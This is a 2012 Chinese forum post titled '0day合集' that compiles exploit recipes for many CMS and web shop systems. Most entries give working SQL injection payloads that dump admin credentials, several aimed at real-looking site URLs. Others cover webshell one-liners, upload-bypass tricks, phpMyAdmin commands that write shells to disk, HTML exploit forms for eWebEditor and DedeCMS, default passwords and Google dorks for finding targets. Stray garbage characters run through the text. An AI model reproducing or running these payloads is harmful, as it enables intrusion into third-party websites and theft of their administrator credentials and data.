找回密码
 立即注册
查看: 4441|回复: 1
打印 上一主题 下一主题

0day合集

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:58:38 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
启航企业建站系统 cookie注入漏洞通杀所有版本
( C$ u7 a1 \- R/ u
* f8 j' |& T; D. c! X直接上exploit:
) k$ Q& p0 v; x9 L8 g; ojavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));. z4 v4 }& D0 c8 W
test:http://www.tb11.net/system/xitong/shownews.asp?id=210; z- Z  F+ w2 E1 p
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------8 U9 g" P: |: M+ Z% U
Asprain论坛 注册用户 上传图片就可拿到webshell
7 [( |! X5 L. c) i( Q( r0 Z  d4 l: V$ M) p5 }8 B; F
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
' e. ~. e6 M/ [" q1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
. \3 k: }- H* W! H2.gif 为一小图片文件,一定要小,比如qq表情图片
* @8 ^" x6 |; `3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用" A# b- o0 d! o* @. o
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了& G; m* O( ?% L, w9 A
5.q.asp;.gif
9 x$ P" u/ J1 X/ \google:Powered by Asprain7 L+ k7 U$ B8 A6 \# b* D
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' v! e5 E) B5 H1 `0 }
: o) U2 g' X. H: U& tShopNum1全部系统存在上传漏洞。9 Y$ j; t: a+ w2 b% u' Y: }

, D9 i$ \) ^# g1 O9 c首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。6 m  O2 [& A/ T4 e
按说明 提示登录后台。。) T! }' c' Q% T2 }7 e0 D+ O, g( A
在后台功能页面->附件管理->附件列表" G- s- z! E. W! R
可以直接上传.aspx 后缀木马, c" D( c, F; g0 b; A: R
http://demo.shopnum1.com/upload/20110720083822500.aspx
: |+ c1 Z% v: S+ w0 E0 t--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 z' |  @; [* H$ b7 R/ r
5 _, I, p  t9 K  H牛牛CMS中小企业网站管理系统 上传漏洞
) Y- Y, P: d) E% O3 r
% u4 Z: P( {7 W9 f牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
' ?2 S: S& T# \; n2 x后台:admin/login.asp
5 F) I# I6 r; ?* }, ?6 Xewebeditor 5.5 Nday
: C" {) W( B7 j" Mexp:
3 E; b- X: a3 a" D<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?$ ~3 C) O6 B1 c. W, @# i' c/ f( s
<input?type=file?name=uploadfile?size=100><br><br>?+ [; Q; |! Y7 S4 q& q
<input?type=submit?value=upload>?0 Y0 ~- W7 t- H! g+ e
</form>
( N5 v$ l* X, T3 Fps:先上传小马.
* b  z' [/ @( x+ U$ P5 Xinurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏! y2 U% v2 X# O2 X" K- E* q
7 R9 x' [( \% t2 a* d9 U# t0 Q
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 ~& n$ R# v( g6 f8 F5 r% u

( A: x# U$ G4 i$ @5 Q0 Z9 ]0 f4 aYothCMS 遍历目录漏洞% _5 c; |) N3 V( w2 E2 B
5 S6 N+ D# a! O; c* W$ g
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。3 R3 \( z0 w6 k8 R
默认后台:admin/login.asp
6 {& Q5 n3 V4 x; `/ _遍历目录:" F. y- Y7 D) R1 i. S* c
ewebeditor/manage/upload.asp?id=1&dir=../
5 H4 z' V/ h$ G1 Z) ?data:; h" c" a! j* @
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
# p: x( c# k6 b" n--------------------------------------------------------------------------------------------------------------------------------------------------------------------------) k$ i1 A# [0 J# x# ^; ~% t: b) W

( z4 ]& ?  C3 v& m. ]Net112企业建站系统 1.0
4 `' j, Q! G! U: t  _+ b' C, }
源码简介:0 L1 l$ c+ @5 v7 P) J- _9 Z
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
  N8 y1 p7 |# ]$ {9 i& V$ `- L添加管理员:
9 E8 ?: @0 g7 G1 hhttp://www.0855.tv/admin/admin.asp?action=add&level=2" U) F9 O/ ^4 c2 E4 }
其实加不加都不是很重要,后台文件都没怎么作验证。
8 t5 n2 k1 l" d& s6 G. ~4 O+ n上传路径:
; h# F, p5 ?% h% {& Rhttp://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
  R5 J/ D1 M: p- h* ~http://www.0855.tv/inc/Upfile.asp?Stype=26 M$ \% h& i/ H% C
怎么利用自己研究。( J! t7 Y. Z4 X* Q% J* g* |
遍历目录:% K& q8 D* z5 {) X
http://www.0855.tv/admin/upfile.asp?path=../..
  f  G. z  p* F+ g- X+ Z( y如:
/ P) q, V5 c* _' x. fhttp://www.0855.tv/admin/upfile.asp?path=../admin$ r3 y5 |5 O$ Q' |' `. u
http://www.0855.tv/admin/upfile.asp?path=../data# @) u1 b; K. Y5 n! R& I
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------! o4 ~  N+ G; G- P; N

. Y; D4 S# F  s: U3 d$ c8 C易和阳光购物商城通杀 上传漏洞3 \; [' M6 c# ]+ e. s! ?* b$ b  N

" l4 E" s- j4 i. U前提要求是IIS6.0+asp坏境。
' K+ A" T; L2 ?* s' Q漏洞文件Iheeo_upfile.asp " s$ h8 T! m1 @7 q( j' N
过滤不严.直接可以iis6.0上传
9 {5 N" P) k2 a& p! `1 p6 X把ASP木马改成0855.asp;1.gif
9 P! r& \, z/ v6 V1 t# k1 z* f直接放到明小子上传
! S) d* u4 p$ E2 UGoogle搜索:inurl:product.asp?Iheeoid=
7 n' f+ s  ~- D--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 {; K8 Z9 F" }& ^8 b
% d: D- r% O5 f3 T/ Tphpmyadmin后台4种拿shell方法
- q! O1 O- h( p& W7 X
9 S8 K) h' Z6 m" w方法一:
2 \- g( }  U6 D# jCREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
) b; n+ n1 |( r7 M8 \; J  gINSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');0 P, m* ^% e  h, f6 D7 k* E
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';5 ~- _3 W4 ]0 ?6 S  j
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php& z; z, K/ R8 \7 y
一句话连接密码:xiaoma
* Q: a) x8 A% I& E7 R方法二:" c; C2 t( [0 _" t
Create TABLE xiaoma (xiaoma1 text NOT NULL);
" L; U9 W4 h: R5 CInsert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
2 z( A0 Q6 L8 Q4 \: pselect xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';8 x9 K8 l+ Y2 @& i* F
Drop TABLE IF EXISTS xiaoma;
9 q' A; g8 P* B7 V0 o1 A方法三:
2 y% l+ i; p$ k3 D( o8 n3 j读取文件内容:    select load_file('E:/xamp/www/s.php');9 E/ ^7 z; n" d6 [% t" ?
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'! X5 t8 d" v, e7 j. [
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
! v0 P/ K- _+ d2 ]6 y8 a方法四:! k- x! O; ~! ]1 z3 R
select load_file('E:/xamp/www/xiaoma.php');# J; u# W3 |6 N" `4 P% k
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
9 ~" T6 S1 E' d% R' X然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
$ G* b  C( S  c: Y--------------------------------------------------------------------------------------------------------------------------------------------------------------------------3 l! C0 G3 s7 G& V9 @0 F: v
0 \* c9 e- Y5 N; G/ ]3 F
传信网络独立开发网站源码0day漏洞/ h# x  |8 A. f) B7 h
) ^* h  z6 a( F0 ]
后台system/login.asp
( u' a; P* B4 q; o" ^进了后台有个ewebeditor8 u* S$ Q" n  A  l2 K
Google 搜索inurl:product1.asp?tyc=
; y; s& x. w6 P- `5 S编辑器漏洞默认后台ubbcode/admin_login.asp
6 u8 g% i( y& ~5 g" h! ]2 X* m" o7 i数据库ubbcode/db/ewebeditor.mdb
& r6 s5 ]1 h9 h3 L" \默认账号密码yzm 111111
( ?* G0 _7 [/ j3 q: p3 [- s. y) _$ x9 b
拿webshell方法
! ~2 ~4 H4 G$ Y0 b# G( e登陆后台点击“样式管理”-选择新增样式
9 r( T6 j! b" R+ s0 a样式名称:scriptkiddies 随便写 $ {. m" u  w  f, i  Q" ^9 R
路径模式:选择绝对路径
: j8 h% h$ |  s8 [0 t图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx  d6 C/ A$ Z/ T0 p6 p
图片类型比如就是我们要上传的ASP木马格式
* }/ p  k/ n( L上传路径:/9 ~9 Y* W; `4 U" z; Y
图片限制:写上1000 免的上不了我们的asp木马0 D' F0 `: E  a! n8 G
上传内容不要写! d# b' |5 y, z% r
可以提交了
7 i0 C8 J) e% V样式增加成功!
3 o+ L& I5 B3 [5 `  `; ~% [$ K- z返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 $ P. r- ], A; S$ S, b; v
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置3 e* M# m' B' e! E9 [6 P" z
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
/ K" \& s% O" t# v$ |6 O上ASP木马 回车 等到路径
# ~0 n; i" [+ R9 }+ z  D. c' M4 S9 G) c( T3 b) ?5 k, n
后台:system/login.asp
  S: ~6 y. t0 [; q6 }2 S+ h! OExp:
4 c% Q* e  Y) ^and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
, W  v& T4 m' c' S测试:
+ V" N- y2 {7 x4 _5 K' Vhttp://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
! x2 _, c; E3 w- n. \, shttp://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
( x: l' n5 F# w--------------------------------------------------------------------------------------------------------------------------------------------------------------------------1 R" j3 M; U) g9 K
# A/ X" _! `+ U
foosun 0day 最新注入漏洞& h+ g& [# ^& ?9 _: O2 [0 A0 U
, O" n" L& G0 ~
漏洞文件:www.xxx.com/user/SetNextOptions.asp) f. @" n* \! I) K  Q9 \/ Y1 ?: a
利用简单的方法:
. Z1 `3 F8 H; S. F暴管理员帐号:
: g' O2 Q0 B* }$ f% ~$ Jhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin$ n$ `+ I7 t9 v1 J( H
暴管理员密码:& S2 E! A& ]7 R) P# l
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
* V1 M( ?2 B* x4 e+ g- K--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) y4 {5 R" C; b
' I+ r( o7 Q/ @; ^6 }* X; t网站程序的版权未知!+ t' P0 s/ X7 ]

! ?, ], z2 y4 e! u默认网站数据库:8 L! _5 G7 i% `! j. y. J' h
www.i0day.com/data/nxnews.mdb. N' A' b7 @4 @2 J7 f; _
ewebeditor 在线编辑器:3 d0 H) n6 V1 O* c
编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb3 m. M0 m( B( q
登录地址:ewebeditor/admin_login.asp
( w$ b5 |# C7 [  z3 E1 C默认密码:admin  admin+ ~4 Q  ^2 g: R; U
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
) |+ U! t2 _# i
  o& [/ e* a* y( j" e( rSql注入漏洞:$ _- W; R4 D" H' x% B, G
http://www.i0day.com/detail.asp?id=123 t* C7 {- f+ z/ i' l6 l2 a
exp:. Z9 R) \. {8 |. Y  n
union select 1,admin,password,4,5,6,7,8 from admin
9 G: ]2 ?5 _1 m8 U$ @, Q爆出明文帐号/密码
% T8 O! m$ D* E3 K4 x0 r9 ?& {5 H" U1 h
上传漏洞:  b, L6 J5 i  h* x: l, x
后台+upfile.asp+ d$ B2 e6 X( ?3 T; O+ l& G; m
如:- F  X! B: m; ]1 T5 e7 D
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。7 u- W) B" L7 ?, K1 W
shell的地址:网址+后台+成功上传的马. w+ A3 `4 f$ g: c
google:inurl:news.asp?lanmuName=- N. H& c, j& Y+ S8 P; o
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) J& ~* w  m2 }5 `6 Q
4 g1 u$ f  S; `0 D7 K, c& H: ]dedecms最新0day利用不进后台直接拿WEBSHELL; R. s+ K; b5 ]. O0 p, M0 u  f% @

" Z8 b8 T1 h$ u+ g) h  i拿webshell的方法如下:* n* c% r2 p0 d) C
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.( L. a) d+ w7 J
前题条件,必须准备好自己的dede数据库,然后插入数据:6 Y0 t; p0 p4 V
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}'); % a1 L& {% \3 u# W

' s, o& S% d4 t* N! A再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。6 x( U9 w- J: }" d
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">- u. {# y7 s+ A4 i- l9 U/ Q
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
3 e9 t( D& Y+ s; R<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
: |, u" M* Y/ o- t<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
" R* ?) x7 p- E5 X# i<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
5 H* ]( d- O) T$ p# C/ I$ W; R0 l<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
5 p8 X  H5 ~4 k. B6 j+ D5 s9 c<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />3 N! s6 G% a: d- g& P
<input type="text" value="true" name="nocache" style="width:400">* e" ?6 z% [' ~7 f7 m
<input type="submit" value="提交" name="QuickSearchBtn"><br />, A9 U$ I" ^) R5 o2 d3 z
</form>
; ^9 }5 }3 J" }( v<script>
  \0 I% P# W  |! @& N& jfunction addaction()
  C% f- q, `7 O7 ]* I{
1 U. I0 o  f' r6 @% V) Jdocument.QuickSearch.action=document.QuickSearch.doaction.value;
) u$ {3 E! [- z3 B* A}0 Z- q& [# N+ u5 S: ]" W6 o
</script>: t# Q0 E3 A. `# V
-----------------------------------------------------------------------------------------------------------------------------------------------
- ^! k3 H, E- }. k3 h: A9 d2 p
  B2 }& g5 o: [5 adedecms织梦暴最新严重0day漏洞6 ~4 N  |9 A; \. X& I- @
bug被利用步骤如下:
! N/ V! f' k: d; o, Nhttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root) K+ Y3 z' e! l8 ]. b
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
6 Z/ b& e# S2 n' p# Z-------------------------------------------------------------------------------------------------------------------------------------------
2 T8 F0 m* V) Q  r. k2 v& H4 e% W& A' Z) A  n6 N* i4 y" K
多多淘宝客程序上传漏洞
$ {1 ?& |5 {% L$ }漏洞页面:
, L( z  H5 f- [6 L3 F, K% Fadmin\upload_pic.php1 |) T: U+ L' k& m0 }
传送门:% F- K: r. |, ^: \
http://www.www.com/admin/upload_pic.php?uploadtext=slide1
5 ?) V3 o9 b  i  Z& Q1 ]4 B2 FPS:copy张图片马 直接  xxx.php 上传抓包地址!/ ~. U  I5 @. _# }& g
------------------------------------------------------------------------------------------------------------------------------------------------------- X1 [/ V! f  M6 D$ f% o

1 M7 E) F" Z0 M2 y无忧公司系统ASP专业版后台上传漏洞
1 a0 b. k: }( J* F漏洞文件 后台上传
/ b+ H# }# @0 \9 U! eadmin/uploadPic.asp
1 D$ e- H. a# L漏洞利用 这个漏洞好像是雷池的
- X% u: ~" T5 p7 P5 A+ y! }http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1" I* R0 v7 {8 W0 h" U0 @8 b& u
等到的webshell路径:  [9 Q) m# w  }% ~; Z! d
/UploadFiles/scriptkiddies.asp;_2.gif" {  M! R$ c+ Q; `
---------------------------------------------------------------------------------------------------------------------------------------------------
5 z! M9 P! g+ y6 |* B" A3 u$ w6 Z; ]: B9 ~
住哪酒店分销联盟系统2010
' J  \$ \, D1 c( k, u- C& c8 dSearch:
; {# v8 `% P5 winurl:index.php?m=hotelinfo! g8 P9 c- Y. F" @: v  j: m
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
- |7 H* \6 ^2 ~, L  E/ E% e. t, q默认后台:index.php?m=admin/login
" \) |# n8 f3 e! d$ Z% a--------------------------------------------------------------------------------------------------------------------------------------------------
/ L9 g. s! B/ I, A1 f! m5 S! d7 n6 H0 l/ [2 Q4 I1 e/ F
inurl:info_Print.asp?ArticleID=
$ L. l' m  H* R  C( d0 N& T+ c后台 ad_login.asp2 K* n% }& W2 |
爆管理员密码:( {1 J1 f* V' K) u( S! d
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
6 Q, P, N* \% Y4 t------------------------------------------------------------------------------------------------------------------------------------------------------------: P  b8 W6 G$ o/ ^

$ t& ^* e2 F7 T搜索框漏洞!
# V% b0 y$ E! q( k& [1 k%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
+ m* Z8 U' g' b; w7 ^--------------------------------------------------------------------------------------------------------------------------------------------------------
7 X; b$ F5 Z; i( Q5 e+ i. n7 O5 p
关键字:6 ]1 u9 F" M8 X  `
inurl:/reg_TemletSel.asp?step=2
! s* S4 v5 @9 e1 b6 @或者: X6 _/ R; W  ~& }# |- q
电子商务自助建站--您理想的助手
2 w/ b) Y% w. Q" @4 r5 W-------------------------------------------------------------------------------------------------------------------------------------------------
  o: w; z9 V4 A
4 ]# Y3 F; E3 W/ j1 biGiveTest 2.1.0注入漏洞/ V% p; P8 Q' G. B, i, M
Version: <= 2.1.0" \8 K0 }& u, j
# Homepage: http://iGiveTest.com/3 U, z1 F9 u: f- x4 f0 h. W
谷歌关键字: “Powered by iGiveTest”
, Z2 @  c7 u$ i9 w随便注册一个帐号。然后暴管理员帐号和密码
0 Z0 v3 }3 r8 r' Z" uhttp://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
- N  N7 @) Y& g: }" h------------------------------------------------------------------------------------------------------------------------------------------------
# ]$ S4 M: M" G9 q" o0 B4 c$ }: h( M2 F: E1 I" h
CKXP网上书店注入漏洞
5 J( H/ I8 T! j# }工具加表:shop_admin 加字段:admin
! V  t* {( w3 v后台:admin/login.asp
) t4 s( E) {% a登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/9 @1 B4 Y6 b1 Y) Z1 i
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
. G. ^5 j3 S3 n5 A  k& P( x--------------------------------------------------------------------------------------------------------------------------------------------------------------------------5 @. _' j" `* S/ f% S
7 j, B8 a* n6 Y; N4 n
段富超个人网站系统留言本写马漏洞
" {0 |/ x. B& `3 a+ z8 m源码下载:http://www.mycodes.net/24/2149.htm
# ?. {$ |. R0 y6 n$ paddgbook.asp 提交一句话。
4 y* B2 p% `  k1 D( c7 U2 q连接: http://www.xxxx.tv/date/date3f.asp
1 E) V( q4 b4 q' s) Fgoogle:为防批量,特略!
* p0 G+ g7 x7 P2 R4 ^-------------------------------------------------------------------------------------------------------------------------------------------------------------------------: [0 M' u  h" d" T

0 P5 H) P2 \6 ]0 L智有道专业旅游系统v1.0 注入及列目录漏洞" e1 w/ A( `; H' h; W
默认后台路径:/admin/login.asp# @/ p0 @% W) s
默认管理员:admin" c6 P" a' f9 l6 a* ^
默认密码:123456
" C  Q/ ^, O. \" YSQL EXP Tset:0 s: n  r* H/ t5 b8 @$ m9 I: N+ c
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin( `  j! d; A, r2 e9 G' d
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# p# F: y  H5 @5 Q, X7 }
/ f  }3 t# b1 c% s4 _7 y$ B( Cewebeditor(PHP) Ver 3.8 本任意文件上传0day
6 S# I" y$ g0 j4 k6 N$ n/ }# OEXP:
" }4 F7 R; y8 Q; ]<title>eWebeditoR3.8 for php任意文件上EXP</title>
8 M/ `0 A6 n( x) H- p- G9 d<form action="" method=post enctype="multip
/ ~$ @6 C' v$ o/ o3 s8 N& v. Hart/form-data"> 6 N* S8 l& j( A7 ]) {. n" E) P% F  A
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> 6 B, ~8 |7 S) s( }1 e% o
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
' m1 S  }* }1 {0 C2 t8 u8 `<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> 9 U4 T$ v. ]8 R
file:<input type=file name="uploadfile"><br>
: T: F+ P% h% S! X<input type=button value=submit onclick=fsubmit()> * t9 M. k  X/ l6 ^, j& _$ G
</form><br>
) W  g" l' g3 O$ U<script> . R& d+ Z4 g9 Y: i2 v6 N; k5 r
function fsubmit(){ & }/ C" T' L) \8 _- M
form = document.forms[0];
4 U6 J' |4 x" Fform.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; ; s- G* Q" w; e: }" ~+ V6 f
alert(form.action); 5 \: g+ I, ]) _9 s0 b
form.submit(); ' l( V6 f' ?# L2 e4 f, f
} 9 L8 }, s, S4 c! l% n5 V7 b
</script>
1 g& [2 r2 m# z+ J- }注意修改里面ewebeditor的名称还有路径。
' W& S- l5 v* Q: _0 ^7 z& ~! q---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 ^3 J9 X" @0 v+ @7 p4 s# k6 @& y: n2 v! l0 G3 r0 Z) j+ W
提交’时提示ip被记录 防注入系统的利用) w& p" W+ w/ ^8 u' z3 Q* Y4 B( a
网址:http://www.xxx.com/newslist.asp?id=122! n; t; l0 ~$ n' v/ F
提示“你的操作已被记录!”等信息。- c  \' w  M  {0 m! G9 U: Q. j
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。
& U7 x( M9 D) [  ?$ t! y  D-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------' [9 Q' N; ^% Q/ s7 k) L

) x4 O  C8 z2 r! n: F& p  }. O西部商务网站管理系统 批量拿shell-0day- [4 u6 ^8 T4 g( n3 @/ c
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb ! O8 q2 c8 b$ l# h: o- b
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛! v4 d+ |" Q" u$ K6 Y
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
. |( m" j! f1 T" M  |( ]! h3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂9 ~# T* x$ `+ I- V+ L# D5 L( r6 b5 T
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) S4 Q- o( ~9 o5 C3 A6 ?; w5 O* o" e2 L0 S" Q: `
JspRun!6.0 论坛管理后台注入漏洞
1 `- ?% t: I. L& a: Y2 i+ z2 A$ p; `7 g2 ^0 X8 H8 }
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:
, b% T8 @; S: W, n# c5 f( [JspRun!6.0 3 a( M4 X9 H+ W  w5 l3 b
漏洞描述:/ ]" q7 c& O( z3 e, ?% s, Q
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。- k$ B/ s2 Z/ P$ K
在处理后台提交的文件中ForumManageAction.java第1940行/ [. A' i% J5 F3 D2 J' A0 a% }
String export = request.getParameter("export");//直接获取,没有安全过滤! {' k+ g9 s" J
if(export!=null){3 d& `  Q0 z% O) Y6 O1 z; T
List&gt; styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
! d' F. T% j$ p1 t! N- qif(styles==null||styles.size()==0){
0 ?* [% }' m/ d% s- z% j2 B<*参考- C: C! n. X  t' ^
nuanfan@gmail.com. |7 ?# r6 B7 i4 u& t, a# a2 Q* v. l# w
*> SEBUG安全建议:2 q: x* J+ X5 {/ q- E: A
www.jsprun.net
0 Q+ j- D+ P9 {$ G' @(1)安全过滤变量export4 h3 b4 g% E0 d! X+ P
(2)在查询语句中使用占位符
% p/ ^1 @+ {  h* d% t7 g" C------------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ z5 g5 e- [+ r. F+ j/ G' o
4 j+ S$ Q, O" _5 u3 H
乌邦图企业网站系统 cookies 注入7 k% ^2 k6 e9 ]0 \: ^8 }
, z/ q0 [! P8 I* l3 j4 I( u
程序完整登陆后台:/admin/login.asp
6 ?& T# S2 x" {6 k& p8 j% o默认登陆帐号:admin 密码:admin888
8 i7 S$ {. x9 i# V( e( ~语句:(前面加个空格)0 C; o4 d0 R2 s( O1 ~3 I, Y' K0 a
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin! B( Q9 z- q7 z% X2 q
或者是16个字段:
( K# U2 r" U* }- S1 uand 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin6 x3 p  S' Q. r7 Z5 n
爆不出来自己猜字段。$ g0 M, v& T- k5 h$ B. r& a- Q% B
注入点:http://www.untnt.com/shownews.asp?=88
+ o6 Y1 D# {$ lgetshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
6 m& d" L7 O8 Z& r关键字:
0 ~% l/ I" m6 C5 [* P) \inurl:shownews?asp.id=
! I4 F# C: |5 L3 t/ L-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ z5 ~2 f3 z9 `/ S* E
0 i) b1 x, {# U7 ]5 r
CKXP网上书店注入漏洞
" k6 e+ k' c/ [# B4 ]% [, ^7 M% g
6 k7 `; L$ R$ ]3 m工具加表:shop_admin 加字段:admin/ Z8 s+ B' i+ }+ W$ L! b0 d( m
后台:admin/login.asp 8 D7 E! N, Q* G! L- {
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=// G4 }% Z  j% H- e# W
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
! i: n" c: \8 N: b3 n( @# _---------------------------------------------------------------------------------------------------------------------------------------------------------------------------. |2 O& C% g/ g& ~& G
! O0 B3 Q1 P) C. p+ i3 N0 H* r
YxShop易想购物商城4.7.1版本任意文件上传漏洞
, @$ |* {1 S* s) {2 Y
" H" M" e0 P; B4 u# W. E! G  Zhttp://xxoo.com/controls/fckedit ... aspx/connector.aspx
  z5 f+ }6 c' U4 t6 R3 D( O0 D跳转到网站根目录上传任意文件。
' c0 E# z: v. Q# P9 N* S如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件& p% i: A/ @" J' M: W5 w
